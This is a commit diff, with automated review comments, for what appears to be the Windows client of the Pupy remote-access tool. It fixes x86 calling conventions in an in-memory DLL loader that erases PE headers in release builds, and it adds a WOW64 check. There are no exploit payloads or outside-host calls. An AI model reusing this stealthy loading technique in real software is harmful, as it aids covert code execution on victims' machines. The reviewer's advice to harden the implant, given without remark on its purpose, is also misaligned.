[Experemental] client/windows: Fix x86-related issues
This commit is contained in:
parent
8d7b168889
commit
7f40611cbf
|
@ -153,8 +153,9 @@ BOOL initialize_python(int argc, char *argv[], BOOL is_shared_object) {
|
||||||
|
|
||||||
Py_IncRef(py_argv);
|
Py_IncRef(py_argv);
|
||||||
|
|
||||||
for (i = 0; i<argc; i++)
|
for (i = 0; i<argc && argv[i]; i++) {
|
||||||
PyList_Append(py_argv, PyString_FromString(argv[i]));
|
PyList_Append(py_argv, PyString_FromString(argv[i]));
|
||||||
|
}
|
||||||
|
|
||||||
PySys_SetObject("executable", PyString_FromString(OSGetProgramName()));
|
PySys_SetObject("executable", PyString_FromString(OSGetProgramName()));
|
||||||
PySys_SetObject("argv", py_argv);
|
PySys_SetObject("argv", py_argv);
|
||||||
|
@ -163,6 +164,7 @@ BOOL initialize_python(int argc, char *argv[], BOOL is_shared_object) {
|
||||||
|
|
||||||
setup_jvm_class();
|
setup_jvm_class();
|
||||||
|
|
||||||
|
dprint("Python initialized\n");
|
||||||
return TRUE;
|
return TRUE;
|
||||||
|
|
||||||
lbExit1:
|
lbExit1:
|
||||||
|
@ -191,7 +193,6 @@ void run_pupy() {
|
||||||
char *pupy_init_bytecode_c;
|
char *pupy_init_bytecode_c;
|
||||||
Py_ssize_t pupy_init_bytecode_c_size;
|
Py_ssize_t pupy_init_bytecode_c_size;
|
||||||
|
|
||||||
|
|
||||||
dprint("Load config\n");
|
dprint("Load config\n");
|
||||||
len.c[3] = __config__[0];
|
len.c[3] = __config__[0];
|
||||||
len.c[2] = __config__[1];
|
len.c[2] = __config__[1];
|
||||||
|
|
|
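Review bot: The string object created by `PyString_FromString(argv[i])` in the rewritten loop is leaked on every iteration, because `PyList_Append` takes its own reference rather than stealing the caller's, and a NULL result (allocation failure) is passed straight into `PyList_Append`. The added `argv[i]` guard is fine, but the append should hold the temporary in a local, check it, and release it after the append; the same pattern applies to the untouched `PySys_SetObject("executable", PyString_FromString(...))` line just below. `initialize_python` and `run_pupy` both start and end outside these hunks, so I am assuming `lbExit1` is the function's existing failure path.
```c
    for (i = 0; i<argc && argv[i]; i++) {
        PyObject *arg = PyString_FromString(argv[i]);
        if (!arg)
            goto lbExit1;
        PyList_Append(py_argv, arg);
        Py_DecRef(arg);
    }
    /* … unchanged: PySys_SetObject("executable", …) and PySys_SetObject("argv", …) … */
```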
@ -195,9 +195,14 @@ FinalizeSection(PMEMORYMODULE module, PSECTIONFINALIZEDATA sectionData) {
|
||||||
if (sectionData->address == sectionData->alignedAddress &&
|
if (sectionData->address == sectionData->alignedAddress &&
|
||||||
(sectionData->last ||
|
(sectionData->last ||
|
||||||
module->headers->OptionalHeader.SectionAlignment == module->pageSize ||
|
module->headers->OptionalHeader.SectionAlignment == module->pageSize ||
|
||||||
(sectionData->size % module->pageSize) == 0)
|
(sectionData->size % module->pageSize) == 0))
|
||||||
) {
|
{
|
||||||
// Only allowed to decommit whole pages
|
// Only allowed to decommit whole pages
|
||||||
|
dprint(
|
||||||
|
"VirtualFree: %p - %p (%lu)\n",
|
||||||
|
sectionData->address, (PCHAR) sectionData->address + sectionData->size, sectionData->size
|
||||||
|
);
|
||||||
|
|
||||||
VirtualFree(sectionData->address, sectionData->size, MEM_DECOMMIT);
|
VirtualFree(sectionData->address, sectionData->size, MEM_DECOMMIT);
|
||||||
}
|
}
|
||||||
return TRUE;
|
return TRUE;
|
||||||
|
@ -213,6 +218,10 @@ FinalizeSection(PMEMORYMODULE module, PSECTIONFINALIZEDATA sectionData) {
|
||||||
}
|
}
|
||||||
|
|
||||||
// change memory access flags
|
// change memory access flags
|
||||||
|
dprint(
|
||||||
|
"VirtualProtect: %p - %p (%lu) %08x\n",
|
||||||
|
sectionData->address, (PCHAR) sectionData->address + sectionData->size, sectionData->size, protect
|
||||||
|
);
|
||||||
if (VirtualProtect(sectionData->address, sectionData->size, protect, &oldProtect) == 0) {
|
if (VirtualProtect(sectionData->address, sectionData->size, protect, &oldProtect) == 0) {
|
||||||
#ifdef DEBUG_OUTPUT
|
#ifdef DEBUG_OUTPUT
|
||||||
OutputLastError("Error protecting memory page");
|
OutputLastError("Error protecting memory page");
|
||||||
|
@ -285,7 +294,8 @@ ExecuteTLS(PMEMORYMODULE module)
|
||||||
PIMAGE_TLS_DIRECTORY tls;
|
PIMAGE_TLS_DIRECTORY tls;
|
||||||
PIMAGE_TLS_CALLBACK* callback;
|
PIMAGE_TLS_CALLBACK* callback;
|
||||||
|
|
||||||
PIMAGE_DATA_DIRECTORY directory = GET_HEADER_DICTIONARY(module, IMAGE_DIRECTORY_ENTRY_TLS);
|
PIMAGE_DATA_DIRECTORY directory = GET_HEADER_DICTIONARY(
|
||||||
|
module, IMAGE_DIRECTORY_ENTRY_TLS);
|
||||||
if (directory->VirtualAddress == 0) {
|
if (directory->VirtualAddress == 0) {
|
||||||
return TRUE;
|
return TRUE;
|
||||||
}
|
}
|
||||||
|
@ -294,6 +304,7 @@ ExecuteTLS(PMEMORYMODULE module)
|
||||||
callback = (PIMAGE_TLS_CALLBACK *) tls->AddressOfCallBacks;
|
callback = (PIMAGE_TLS_CALLBACK *) tls->AddressOfCallBacks;
|
||||||
if (callback) {
|
if (callback) {
|
||||||
while (*callback) {
|
while (*callback) {
|
||||||
|
dprint("Call TLS Callback %p\n", callback);
|
||||||
(*callback)((LPVOID) codeBase, DLL_PROCESS_ATTACH, NULL);
|
(*callback)((LPVOID) codeBase, DLL_PROCESS_ATTACH, NULL);
|
||||||
callback++;
|
callback++;
|
||||||
}
|
}
|
||||||
|
@ -809,10 +820,12 @@ HMEMORYMODULE MemoryLoadLibraryEx(
|
||||||
|
|
||||||
dprint("MemoryLoadLibraryEx: Library loaded\n");
|
dprint("MemoryLoadLibraryEx: Library loaded\n");
|
||||||
|
|
||||||
|
#ifndef DEBUG
|
||||||
// Cleanup PE headers
|
// Cleanup PE headers
|
||||||
CleanupHeaders(result);
|
CleanupHeaders(result);
|
||||||
|
|
||||||
dprint("MemoryLoadLibraryEx: headers cleaned up\n");
|
dprint("MemoryLoadLibraryEx: headers cleaned up\n");
|
||||||
|
#endif
|
||||||
|
|
||||||
return (HMEMORYMODULE)result;
|
return (HMEMORYMODULE)result;
|
||||||
|
|
||||||
|
|
|
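Review bot: The new `dprint` calls in `FinalizeSection` format `sectionData->size` with `%lu`; if `size` is `SIZE_T` as in upstream MemoryModule it is 64 bits wide on x64 while `%lu` is 32 bits on Windows, so the following arguments are read from the wrong slot (undefined behaviour even in a debug-only path). Either cast it, `(unsigned long) sectionData->size`, or use whichever size_t conversion your `dprint` backend supports. Separately, the TLS trace `dprint("Call TLS Callback %p\n", callback)` prints the address of the table slot rather than the callback being invoked; `*callback` is what a reader of the log wants. Both `FinalizeSection` and `ExecuteTLS` extend beyond their hunks.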
@ -39,14 +39,14 @@ typedef void *HCUSTOMMODULE;
|
||||||
extern "C" {
|
extern "C" {
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
typedef HMODULE (*CustomGetModuleHandleA)(LPCSTR);
|
typedef HMODULE (CALLBACK *CustomGetModuleHandleA)(LPCSTR);
|
||||||
typedef HMODULE (*CustomGetModuleHandleW)(LPCWSTR);
|
typedef HMODULE (CALLBACK *CustomGetModuleHandleW)(LPCWSTR);
|
||||||
typedef HMODULE (*CustomLoadLibraryExA)(LPCSTR, HANDLE, DWORD);
|
typedef HMODULE (CALLBACK *CustomLoadLibraryExA)(LPCSTR, HANDLE, DWORD);
|
||||||
typedef HMODULE (*CustomLoadLibraryExW)(LPCWSTR, HANDLE, DWORD);
|
typedef HMODULE (CALLBACK *CustomLoadLibraryExW)(LPCWSTR, HANDLE, DWORD);
|
||||||
typedef HCUSTOMMODULE (*CustomLoadLibraryW)(LPCWSTR);
|
typedef HCUSTOMMODULE (CALLBACK *CustomLoadLibraryW)(LPCWSTR);
|
||||||
typedef HCUSTOMMODULE (*CustomLoadLibraryA)(LPCSTR);
|
typedef HCUSTOMMODULE (CALLBACK *CustomLoadLibraryA)(LPCSTR);
|
||||||
typedef FARPROC (*CustomGetProcAddress)(HCUSTOMMODULE, LPCSTR);
|
typedef FARPROC (CALLBACK *CustomGetProcAddress)(HCUSTOMMODULE, LPCSTR);
|
||||||
typedef void (*CustomFreeLibraryFunc)(HCUSTOMMODULE);
|
typedef void (CALLBACK *CustomFreeLibraryFunc)(HCUSTOMMODULE);
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Load EXE/DLL from memory location.
|
* Load EXE/DLL from memory location.
|
||||||
|
@ -85,14 +85,6 @@ FARPROC MemoryGetProcAddress(HMEMORYMODULE, LPCSTR);
|
||||||
*/
|
*/
|
||||||
void MemoryFreeLibrary(HMEMORYMODULE);
|
void MemoryFreeLibrary(HMEMORYMODULE);
|
||||||
|
|
||||||
HMODULE MyGetModuleHandleA(LPCSTR name);
|
|
||||||
HMODULE MyGetModuleHandleW(LPCWSTR name);
|
|
||||||
HMODULE MyLoadLibraryA(LPCSTR name);
|
|
||||||
HMODULE MyLoadLibraryW(LPCWSTR name);
|
|
||||||
|
|
||||||
HMODULE MyLoadLibraryExA(LPCSTR lpLibFileName, HANDLE hFile, DWORD dwFlags);
|
|
||||||
HMODULE MyLoadLibraryExW(LPCWSTR lpLibFileName, HANDLE hFile, DWORD dwFlags);
|
|
||||||
|
|
||||||
#ifdef __cplusplus
|
#ifdef __cplusplus
|
||||||
}
|
}
|
||||||
#endif
|
#endif
|
||||||
|
|
|
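Review bot: Adding `CALLBACK` (stdcall on x86) to the `Custom*` function-pointer typedefs changes the ABI of every function stored in them, so any default implementation MemoryModule.c installs when the caller passes NULL, and any other provider in the tree, must also be declared `CALLBACK`; an unconverted cdecl function called through these pointers compiles cleanly and corrupts the stack on 32-bit builds. The `My*` definitions in this commit were converted, but MemoryModule.c's own fallbacks are not visible from here, so please confirm they were too. A one-line comment on the typedef group would stop the next contributor from dropping the qualifier: `/* All custom loader hooks are CALLBACK (stdcall on x86); every provider must match or the x86 stack is corrupted. */`.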
@ -252,7 +252,7 @@ static PHCUSTOMLIBRARY _AddMemoryModule(
|
||||||
/****************************************************************
|
/****************************************************************
|
||||||
* Public functions
|
* Public functions
|
||||||
*/
|
*/
|
||||||
HMODULE MyGetModuleHandleA(LPCSTR name)
|
HMODULE CALLBACK MyGetModuleHandleA(LPCSTR name)
|
||||||
{
|
{
|
||||||
PHCUSTOMLIBRARY lib;
|
PHCUSTOMLIBRARY lib;
|
||||||
|
|
||||||
|
@ -331,7 +331,8 @@ BOOL _CreateModuleMapping(HMODULE hModule, HANDLE *phMapping, PVOID *ppvMem)
|
||||||
return TRUE;
|
return TRUE;
|
||||||
}
|
}
|
||||||
|
|
||||||
HMODULE MyLoadLibraryEx(LPCSTR name, void *bytes, void *dllmainArg, BOOL blPrivate)
|
HMODULE
|
||||||
|
MyLoadLibraryEx(LPCSTR name, void *bytes, void *dllmainArg, BOOL blPrivate)
|
||||||
{
|
{
|
||||||
HMODULE hLoadedModule = NULL;
|
HMODULE hLoadedModule = NULL;
|
||||||
|
|
||||||
|
@ -402,7 +403,7 @@ HMODULE MyLoadLibraryEx(LPCSTR name, void *bytes, void *dllmainArg, BOOL blPriva
|
||||||
return LoadLibrary(name);
|
return LoadLibrary(name);
|
||||||
}
|
}
|
||||||
|
|
||||||
HMODULE MyGetModuleHandleW(LPCWSTR name) {
|
HMODULE CALLBACK MyGetModuleHandleW(LPCWSTR name) {
|
||||||
PSTR pszName = NULL;
|
PSTR pszName = NULL;
|
||||||
HMODULE hResult = NULL;
|
HMODULE hResult = NULL;
|
||||||
DWORD dwRequiredSize = WideCharToMultiByte(
|
DWORD dwRequiredSize = WideCharToMultiByte(
|
||||||
|
@ -435,7 +436,7 @@ HMODULE MyGetModuleHandleW(LPCWSTR name) {
|
||||||
return GetModuleHandleW(name);
|
return GetModuleHandleW(name);
|
||||||
}
|
}
|
||||||
|
|
||||||
HMODULE MyLoadLibraryExA(LPCSTR name, HANDLE hFile, DWORD dwFlags) {
|
HMODULE CALLBACK MyLoadLibraryExA(LPCSTR name, HANDLE hFile, DWORD dwFlags) {
|
||||||
HMODULE hModule = MyGetModuleHandleA(name);
|
HMODULE hModule = MyGetModuleHandleA(name);
|
||||||
if (hModule)
|
if (hModule)
|
||||||
return hModule;
|
return hModule;
|
||||||
|
@ -443,7 +444,7 @@ HMODULE MyLoadLibraryExA(LPCSTR name, HANDLE hFile, DWORD dwFlags) {
|
||||||
return LoadLibraryExA(name, hFile, dwFlags);
|
return LoadLibraryExA(name, hFile, dwFlags);
|
||||||
}
|
}
|
||||||
|
|
||||||
HMODULE MyLoadLibraryExW(LPCWSTR name, HANDLE hFile, DWORD dwFlags) {
|
HMODULE CALLBACK MyLoadLibraryExW(LPCWSTR name, HANDLE hFile, DWORD dwFlags) {
|
||||||
HMODULE hModule = MyGetModuleHandleW(name);
|
HMODULE hModule = MyGetModuleHandleW(name);
|
||||||
if (hModule)
|
if (hModule)
|
||||||
return hModule;
|
return hModule;
|
||||||
|
@ -451,7 +452,7 @@ HMODULE MyLoadLibraryExW(LPCWSTR name, HANDLE hFile, DWORD dwFlags) {
|
||||||
return LoadLibraryExW(name, hFile, dwFlags);
|
return LoadLibraryExW(name, hFile, dwFlags);
|
||||||
}
|
}
|
||||||
|
|
||||||
HMODULE MyLoadLibraryA(LPCSTR name) {
|
HMODULE CALLBACK MyLoadLibraryA(LPCSTR name) {
|
||||||
HMODULE hModule = MyGetModuleHandleA(name);
|
HMODULE hModule = MyGetModuleHandleA(name);
|
||||||
if (hModule)
|
if (hModule)
|
||||||
return hModule;
|
return hModule;
|
||||||
|
@ -459,7 +460,7 @@ HMODULE MyLoadLibraryA(LPCSTR name) {
|
||||||
return LoadLibraryA(name);
|
return LoadLibraryA(name);
|
||||||
}
|
}
|
||||||
|
|
||||||
HMODULE MyLoadLibraryW(LPCWSTR name) {
|
HMODULE CALLBACK MyLoadLibraryW(LPCWSTR name) {
|
||||||
HMODULE hModule = MyGetModuleHandleW(name);
|
HMODULE hModule = MyGetModuleHandleW(name);
|
||||||
if (hModule)
|
if (hModule)
|
||||||
return hModule;
|
return hModule;
|
||||||
|
@ -467,7 +468,7 @@ HMODULE MyLoadLibraryW(LPCWSTR name) {
|
||||||
return LoadLibraryW(name);
|
return LoadLibraryW(name);
|
||||||
}
|
}
|
||||||
|
|
||||||
BOOL MyFreeLibrary(HMODULE module)
|
BOOL CALLBACK MyFreeLibrary(HMODULE module)
|
||||||
{
|
{
|
||||||
PHCUSTOMLIBRARY lib = _FindMemoryModule(NULL, module);
|
PHCUSTOMLIBRARY lib = _FindMemoryModule(NULL, module);
|
||||||
if (lib) {
|
if (lib) {
|
||||||
|
@ -540,7 +541,7 @@ BOOL isAllowedSymbol(PHCUSTOMLIBRARY lib, LPCSTR procname) {
|
||||||
return FALSE;
|
return FALSE;
|
||||||
}
|
}
|
||||||
|
|
||||||
FARPROC MyGetProcAddress(HMODULE module, LPCSTR procname)
|
FARPROC CALLBACK MyGetProcAddress(HMODULE module, LPCSTR procname)
|
||||||
{
|
{
|
||||||
PHCUSTOMLIBRARY lib;
|
PHCUSTOMLIBRARY lib;
|
||||||
FARPROC fpFunc = NULL;
|
FARPROC fpFunc = NULL;
|
||||||
|
|
|
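Review bot: `MyFreeLibrary` is now `BOOL CALLBACK` while the `CustomFreeLibraryFunc` typedef it appears intended to satisfy is `void (CALLBACK *)(HCUSTOMMODULE)`, so if it is assigned to that pointer the call goes through an incompatible function type (undefined behaviour in C, even if harmless in practice on stdcall). Either change the typedef to `typedef BOOL (CALLBACK *CustomFreeLibraryFunc)(HCUSTOMMODULE);` or wrap `MyFreeLibrary` in a `void CALLBACK` adapter at the assignment site. `MyLoadLibraryEx(LPCSTR, void *, void *, BOOL)` was deliberately left cdecl; a short comment saying it is not a loader hook would make that asymmetry look intentional rather than missed. Several of these functions continue outside their hunks.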
@ -3,16 +3,22 @@
|
||||||
|
|
||||||
#include <windows.h>
|
#include <windows.h>
|
||||||
|
|
||||||
|
#ifndef CALLBACK
|
||||||
|
#define CALLBACK WINAPI
|
||||||
|
#endif
|
||||||
|
|
||||||
HMODULE MyLoadLibrary(LPCSTR, void *, void *);
|
HMODULE MyLoadLibrary(LPCSTR, void *, void *);
|
||||||
HMODULE MyLoadLibraryEx(LPCSTR, void *, void *, BOOL);
|
HMODULE MyLoadLibraryEx(LPCSTR, void *, void *, BOOL);
|
||||||
|
|
||||||
HMODULE MyGetModuleHandle(LPCSTR);
|
HMODULE CALLBACK MyLoadLibraryA(LPCSTR);
|
||||||
BOOL MyFreeLibrary(HMODULE);
|
HMODULE CALLBACK MyLoadLibraryW(LPCWSTR);
|
||||||
|
HMODULE CALLBACK MyLoadLibraryExA(LPCSTR name, HANDLE hFile, DWORD dwFlags);
|
||||||
|
HMODULE CALLBACK MyLoadLibraryExW(LPCWSTR name, HANDLE hFile, DWORD dwFlags);
|
||||||
|
HMODULE CALLBACK MyGetModuleHandleA(LPCSTR name);
|
||||||
|
HMODULE CALLBACK MyGetModuleHandleW(LPCWSTR name);
|
||||||
|
FARPROC CALLBACK MyGetProcAddress(HMODULE, LPCSTR);
|
||||||
|
BOOL CALLBACK MyFreeLibrary(HMODULE module);
|
||||||
|
|
||||||
HMODULE MyLoadLibraryA(LPCSTR);
|
|
||||||
HMODULE MyLoadLibraryW(LPCWSTR);
|
|
||||||
|
|
||||||
FARPROC MyGetProcAddress(HMODULE, LPCSTR);
|
|
||||||
FARPROC MyFindProcAddress(LPCSTR modulename, LPCSTR procname);
|
FARPROC MyFindProcAddress(LPCSTR modulename, LPCSTR procname);
|
||||||
|
|
||||||
VOID MySetLibraries(PVOID pLibraries);
|
VOID MySetLibraries(PVOID pLibraries);
|
||||||
|
|
|
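Review bot: The `#ifndef CALLBACK` / `#define CALLBACK WINAPI` fallback sits after `#include <windows.h>`, which always defines both macros, so the fallback is dead; and in any environment where `CALLBACK` were genuinely missing, `WINAPI` would be missing too, so it does not buy portability either. Either drop the three lines or make them self-contained (`#define CALLBACK __stdcall`) with a comment naming the non-Windows consumer they are for. The old `HMODULE MyGetModuleHandle(LPCSTR);` prototype is removed with no replacement declared here; if any translation unit still calls it the compiler will now see an implicit declaration (an error under C99 and later), so it is worth grepping before merge.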
@ -14,10 +14,10 @@
|
||||||
#define PATH_MAX 260
|
#define PATH_MAX 260
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
typedef FARPROC (*resolve_symbol_t) (HMODULE hModule, const char *name);
|
typedef FARPROC (WINAPI *resolve_symbol_t) (HMODULE hModule, const char *name);
|
||||||
|
|
||||||
static char *OSGetProgramName() {
|
static char *OSGetProgramName() {
|
||||||
static char *program_name = NULL;
|
static const char *program_name = "";
|
||||||
static BOOL is_set = FALSE;
|
static BOOL is_set = FALSE;
|
||||||
|
|
||||||
wchar_t exe[PATH_MAX];
|
wchar_t exe[PATH_MAX];
|
||||||
|
|
|
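Review bot: `program_name` is now a `static const char *` initialised to the literal `""`, but `OSGetProgramName` still returns plain `char *`, so the function discards a qualifier and hands callers a writable pointer to a string literal; writing through it is undefined behaviour. The visible caller passes the result to `PyString_FromString`, which takes `const char *`, so the signature can safely become `static const char *OSGetProgramName(void) {` — other callers are not visible from here. The function body continues past the hunk.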
@ -166,6 +166,30 @@ static const PSTR Kernel32AllowedPrefixes[] = {
|
||||||
"Write", "Read", "Terminate", "Resume", "Virtual",
|
"Write", "Read", "Terminate", "Resume", "Virtual",
|
||||||
"Reg", NULL
|
"Reg", NULL
|
||||||
};
|
};
|
||||||
|
|
||||||
|
typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);
|
||||||
|
LPFN_ISWOW64PROCESS fnIsWow64Process;
|
||||||
|
|
||||||
|
BOOL IsWow64()
|
||||||
|
{
|
||||||
|
#ifdef WIN_X86
|
||||||
|
BOOL bIsWow64 = TRUE;
|
||||||
|
|
||||||
|
//IsWow64Process is not available on all supported versions of Windows.
|
||||||
|
//Use GetModuleHandle to get a handle to the DLL that contains the function
|
||||||
|
//and GetProcAddress to get a pointer to the function if available.
|
||||||
|
|
||||||
|
fnIsWow64Process = (LPFN_ISWOW64PROCESS) GetProcAddress(
|
||||||
|
GetModuleHandle("kernel32"),"IsWow64Process");
|
||||||
|
|
||||||
|
if(NULL != fnIsWow64Process)
|
||||||
|
fnIsWow64Process(GetCurrentProcess(),&bIsWow64);
|
||||||
|
|
||||||
|
return bIsWow64;
|
||||||
|
#else
|
||||||
|
return FALSE;
|
||||||
|
#endif
|
||||||
|
}
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
void initialize(BOOL isDll, on_exit_session_t *cb) {
|
void initialize(BOOL isDll, on_exit_session_t *cb) {
|
||||||
|
@ -185,9 +209,13 @@ void initialize(BOOL isDll, on_exit_session_t *cb) {
|
||||||
dprint("TEMPLATE REV: %s\n", GIT_REVISION_HEAD);
|
dprint("TEMPLATE REV: %s\n", GIT_REVISION_HEAD);
|
||||||
|
|
||||||
#ifdef _PUPY_PRIVATE_NT
|
#ifdef _PUPY_PRIVATE_NT
|
||||||
hNtDll = GetModuleHandleA("NTDLL.DLL");
|
if (IsWow64()) {
|
||||||
hKernelBase = GetModuleHandleA("KERNELBASE.DLL");
|
dprint("WOW64 + _PUPY_PRIVATE_NT known to be broken right now\n");
|
||||||
hKernel32 = GetModuleHandleA("KERNEL32.DLL");
|
} else {
|
||||||
|
hNtDll = GetModuleHandleA("NTDLL.DLL");
|
||||||
|
hKernelBase = GetModuleHandleA("KERNELBASE.DLL");
|
||||||
|
hKernel32 = GetModuleHandleA("KERNEL32.DLL");
|
||||||
|
}
|
||||||
|
|
||||||
if (hNtDll && hKernel32 && hKernelBase) {
|
if (hNtDll && hKernel32 && hKernelBase) {
|
||||||
HMODULE hPrivate;
|
HMODULE hPrivate;
|
||||||
|
|
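Review bot: `IsWow64` treats any failure as WOW64: `bIsWow64` starts `TRUE`, the return value of `fnIsWow64Process` is never checked, and a missing export leaves the default in place, which in `initialize` then skips the private-NT setup; if that fail-safe is intended, say so, e.g. `// Default TRUE: if the probe is unavailable or fails, assume WOW64 and skip the private-NT path.`. `fnIsWow64Process` is a non-static file-scope global rewritten on every call; a `static` local (`static LPFN_ISWOW64PROCESS fnIsWow64Process = NULL;`) keeps it out of the link namespace. The lookup uses the generic `GetModuleHandle("kernel32")` whereas the rest of this file calls `GetModuleHandleA` explicitly; with `UNICODE` defined the narrow literal would not compile, so `GetModuleHandleA("kernel32")` is the consistent choice. The `initialize` hunk starts inside its function, so I cannot confirm `hNtDll`/`hKernelBase`/`hKernel32` are NULL-initialised when the WOW64 branch leaves them untouched.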